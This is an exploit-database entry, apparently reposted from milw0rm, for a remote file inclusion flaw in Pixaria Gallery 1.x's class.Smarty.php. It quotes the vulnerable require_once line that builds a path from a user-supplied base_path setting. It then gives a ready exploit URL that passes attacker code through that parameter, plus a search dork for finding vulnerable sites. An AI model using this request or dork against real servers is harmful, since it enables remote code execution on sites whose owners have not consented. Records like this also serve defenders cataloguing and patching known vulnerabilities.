[] NeoSense

Pixaria Gallery 1.x - 'class.Smarty.php' Remote File Inclusion

Author: irvian
type: webapps
platform: php
port: 
date_added: 2007-04-13 
date_updated:  
verified: 1 
codes: OSVDB-34977;CVE-2007-2458;CVE-2007-2457;OSVDB-34976 
tags: 
aliases:  
screenshot_url:  
application_url: 

Pixaria Gallery 1.x (class.Smarty.php) Remote File Include Vulnerability

-----------------------------------------------------------------------------------------
# scripts            : Pixaria Gallery 1.x
# Discovered By : irvian
# scripts site      : http://pixaria.com/
# Thanks To       : #hitamputih  #nyubicrew  #patihack
# special To       : nyubi,ibnusina,arioo,jipank,kacung,trangkil,cah_gemblunkz
# dork                : powered by Pixaria. Gallery
------------------------------------------------------------------------------------------
bug found:

/resources/includes/class.Smarty.php
// Load the main Smarty class
require_once ($cfg['sys']['base_path'] . "resources/smarty/libs/Smarty.class.php");


Exploit: http://www.target.com/resources/includes/class.Smarty.php?cfg[sys][base_path]=[evilcode]

# milw0rm.com [2007-04-14]